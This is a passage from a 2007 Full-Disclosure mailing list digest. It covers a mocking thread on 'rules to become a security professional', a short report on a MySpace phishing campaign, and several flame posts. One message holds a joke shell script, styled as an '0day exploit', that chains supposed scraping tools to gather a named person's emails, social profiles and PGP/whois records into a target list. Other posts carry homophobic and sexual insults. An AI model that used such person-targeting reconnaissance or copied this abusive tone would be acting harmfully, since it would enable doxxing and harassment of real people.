The sixth most important rule to becoming a security professional is be paranoid. Yes, don't listen to people who say paranoia is bad for you. In this industry it pays to be paranoid. Forget about your own welfare, you've got millions of users and the economic stability of the world to think about. Trade in your own life to save the life of others. Indeed being a security professional will mean long hours, and sleepless nights. Be prepared to be woken up in the middle of the night and expect to have people shouting for answers down the phone to you or rush you into the security operations center when news of a major data breach reaches the inbox of your security team.

"Be prepared to be woken up in the middle of the night and expect to have people shouting for answers down the phone to you or rush you into the security operations center when news of a major data breach reaches the inbox of your security team." This is what a professional at computer security undergoes? I thought I could just, be in my bedroom reading about aix security enhancements and win32 buffer overflow prevention methods

The seventh most important rule to becoming a security professional. Think for yourself don't post ridiculous questions to a public mailing list and expect to get the right answer, most folks will make anything up and people generally cannot be trusted. Use search engines, read books and free your mind from what other security researchers are doing. Don't duplicate, originate your own work.

He talks a whole lot about mailing lists

The eighth most important rule to becoming a good security professional is have balls, if you think something is wrong, don't be afraid to speak up, even if it means losing your job. Remember, the security of other people comes before the security of your job position. So if you think something is wrong, tell people about it, and if they don't listen, then keep repeating it over and over. Never give in and keep on trying to tell people about something you believe in. You are a slave to the security of others, you don't come first "they" do.

So what's wrong buddy?

Ninth most important rule to becoming a good security professional. Don't read public mailing lists, don't read security news sites, and don't read web logs about what other people think about security. They all suck, don't trust anyone in this world and don't believe the hype. 99.9% of anything post in public is attention grabbing bullshit, you don't need it. Concentrate with whats going on within your own company and screw all the others. Only read these mediums if its related to what you're doing that day at work to fix a bug or thwart a security incident. Don't read about what could happen, stick to with whats actually happening to you that day. Not what other people say is going to happen next week.

Tenth most important rule to becoming a security professional, know your enemy. Yes, get to know them, eavesdrop on them, send them gifts and make them feel special. Your enemy is the single most important person to you and your company's assets. If you don't know what your enemy is doing then you don't have security. Remember though, don't concentrate on other peoples enemies, concentrate on enemies for your company. Don't read websites that say they are your enemy, because its unlikely they really are. Your real enemies don't announce themselves often and are unlikely to make public announcements about it, and the ones that do are usually hoaxes.

Fuck, I couldn't read it all.. I got exhauzted

rchrafe.wordpress.com

------------------------------

Message: 13
Date: Tue, 20 Nov 2007 07:46:58 +0100
From: rchrafe <rchrafe () gmail com>
Subject: Re: [Full-disclosure] How to become a Computer Security Professional ?
To: Richard Golodner <rgolodner () infratection com>
Cc: full-disclosure () lists grok org uk
Message-ID: <474282E2.50009 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Richard Golodner wrote:

Get a good job where you can find best security practices being
used and learn from others who have been in the field. You will develop your own set of tools and ideas, but the concepts are almost always the same. Defense in depth is a good idea and it works.

11th most important rule. Never ever take advice that has ten rules about something they know nothing about.

N3TD3V, please go away. Come back under a different alias if you must but please STFU! The guy wanted a serious answer and you broke many of your own rules. Don't get your kilt all bunched up, just be serious for once in your net-sec career.

Richard Golodner
Infratection IT Services

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

You're so gay dude

------------------------------

Message: 14
Date: Tue, 20 Nov 2007 07:49:20 +0100
From: rchrafe <rchrafe () gmail com>
Subject: Re: [Full-disclosure] How to become a Computer Security Professional ?
To: XSS Worm XSS Security Information Portal <cross-site-scripting-security () xssworm com>
Cc: full-disclosure () lists grok org uk
Message-ID: <47428370.6050500 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

XSS Worm XSS Security Information Portal wrote:

#!/bin/sh # 0day exploit for Paul Schmehl # based on information provided by Paul Schmehl # pauls () utdallas edu <mailto:pauls () utdallas edu> # echo pauls > /hack/edu/utdallas.edu/known.addresses googledump.pl --email-addresses --context-links --referers --extended-links -keywords"Paul","Schmehl","utdallas.edu<http://utdallas.edu>", "pauls@", "pauls@utdallas ","paul.schmehl@" --verbose socialgrab.pl --known-address "pauls () utdallas edu <mailto:pauls () utdallas edu>" --real-name "Paul Schmehl" --tags=security,hacking,utdallas,vulnerability --search=facebook,youtube,live,myspace,igoogle,yahoo,netvouz,rojo,digg,bebo,ebay,blogger,wordpress--verbose --dump-links infopull.pl --pgp-search --whois --domaintools --usenet --trackers--irclog --mirrors --listserv --known-addresses="pauls () utdallas edu<mailto:pauls () utdallas edu>" echo "Paul Schmehl" >> /hack/TO-DO/pauls.at.utdallas.dot.edu # http://xssworm.com

HAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAAHAHAHAHAHAHAHHAA

On 11/19/07, *Paul Schmehl* <pauls () utdallas edu <mailto:pauls () utdallas edu>> wrote:

--On November 19, 2007 3:34:23 AM +0000 worried security <worriedsecurity () googlemail com <mailto:worriedsecurity () googlemail com>> wrote:

>
> The fourth most important rule to becoming a security professional,
> always use a throw-away e-mail account so it doesn't matter of script
> kids hi-jack your e-mail account with the next cross-site scripting
> vulnerability that gets posted to the public mailing lists.
>

You forgot the most important rule of all. Pay no heed to bozos who post anonymously and don't even have a job in security. Their advice is usually worth just as much as their reputation.

Paul Schmehl ( pauls () utdallas edu <mailto:pauls () utdallas edu>)
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/ <http://www.utdallas.edu/ir/security/>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html <http://lists.grok.org.uk/full-disclosure-charter.html>
Hosted and sponsored by Secunia - http://secunia.com/

--
Francesco Vaj [CISSP - GIAC]
CSS Security Researcher
mailto: vaj () nospam xssworm com <mailto:vaj () nospam xssworm com>
aim: XSS Cross Site
------
XSS Cross Site Scripting Attacks
Web 2.0 Application Security Information Blog (tm) 2007
http://www.XSSworm.com/
------
"Vaj, bella vaj.

------------------------------

Message: 15
Date: Mon, 19 Nov 2007 20:52:30 -0800
From: "Dancho Danchev" <dancho.danchev () gmail com>
Subject: [Full-disclosure] Large Scale MySpace Phishing Attack
To: full-disclosure () lists grok org uk
Message-ID: <b787ce30711192052k34755398t7a9c2c3c1c98418 () mail gmail com>
Content-Type: text/plain; charset=ISO-8859-1

In need of a "creative phishing campaign of the year"?
Try this, perhaps the largest phishing attack spoofing MySpace and collecting all the login details at a central location, that's been active for over a month, and continues to be. A Chinese phishing group has come up with legitimate looking MySpace profiles (profile.myspace.com) in the form of subdomains at their original .cn domains, and by doing
so achieve its ultimate objective - establish trust through typosquatting, remain beneath the security vendors radar by comment spamming the URLs inside MySpace, and obtain the login details of everyone who got tricked. Complete assessment in the form of domains and URLs participating,
as well as the message used per domain for the internal comment spam campaign, is available here :

http://ddanchev.blogspot.com/2007/11/large-scale-myspace-phishing-attack.html

Regards,
Dancho

------------------------------

Message: 16
Date: Mon, 19 Nov 2007 23:25:04 -0500 (GMT-05:00)
From: Elazar Broad <elazarb () earthlink net>
Subject: Re: [Full-disclosure] Multiple stack-based buffer overflows in dxmsft.dll
To: "full-disclosure () lists grok org uk" <full-disclosure () lists grok org uk>
Message-ID: <22163281.1195532704914.JavaMail.root@elwamui-rubis.atl.sa.earthlink.net>
Content-Type: text/plain; charset=UTF-8

I did not see this: http://www.milw0rm.com/exploits/4251, my apologies, please ignore my last post...

------------------------------

Message: 17
Date: Tue, 20 Nov 2007 08:34:58 +0100
From: rchrafe <rchrafe () gmail com>
Subject: Re: [Full-disclosure] so gay huh?
To: Richard Golodner <rgolodner () infratection com>, full-disclosure () lists grok org uk
Message-ID: <47428E22.5060807 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Richard Golodner wrote:
> Please come and introduce yourself to me at any Info-Sec conference or convention so we can meet face to face. We will see what is up then.
> Richard Golodner

Mr Golodner, I'm currently unaware as to why you want us to come and
meet you at an info-sec conference, or convention, things like defcon and HOPE
are for the utterly pathetic. We don't know what to say, you're too funny to take seriously. Never email us again, you piece of garbage.

rcbrafe

------------------------------

Message: 18
Date: Tue, 20 Nov 2007 08:57:18 +0100
From: rchrafe <rchrafe () gmail com>
Subject: Re: [Full-disclosure] so gay huh?
To: Richard Golodner <rgolodner () infratection com>, full-disclosure () lists grok org uk
Message-ID: <4742935E.4060008 () gmail com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed

Richard Golodner wrote:
> You think those are professional conferences? Those are script children parties for retards that can't get laid.

LOL -- Like my, RCHRAFE didn't know this.

> Come to a Homeland Security meeting

Our affiliates are members of several.

> or a National Security briefing.

What about CTU ?

> You can't even hide your own identity properly...

You know who we are? SHIT We're going to die a sudden death!

> I did not say I wanted to meet you.

That's too bad, I'm horny f0r y0u

> What I am saying is that if you are so tough, step and be a man.

/me stepz up & becomez 4 m4n

> At least use your real name or I will begin to publicize it for you if you would like.

Firstly: Richard Golodner i love pissing you off, it gets me off.
Secondly: Your post previously sometime ago made me cum all over my k3yb04rd: http://osdir.com/ml/network.nsp.cisco/2003-08/msg00019.html

You probably don't know the difference between IGRP and EIGRP routing protocolz

What a loser, haha.

------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

End of Full-Disclosure Digest, Vol 33, Issue 38
***********************************************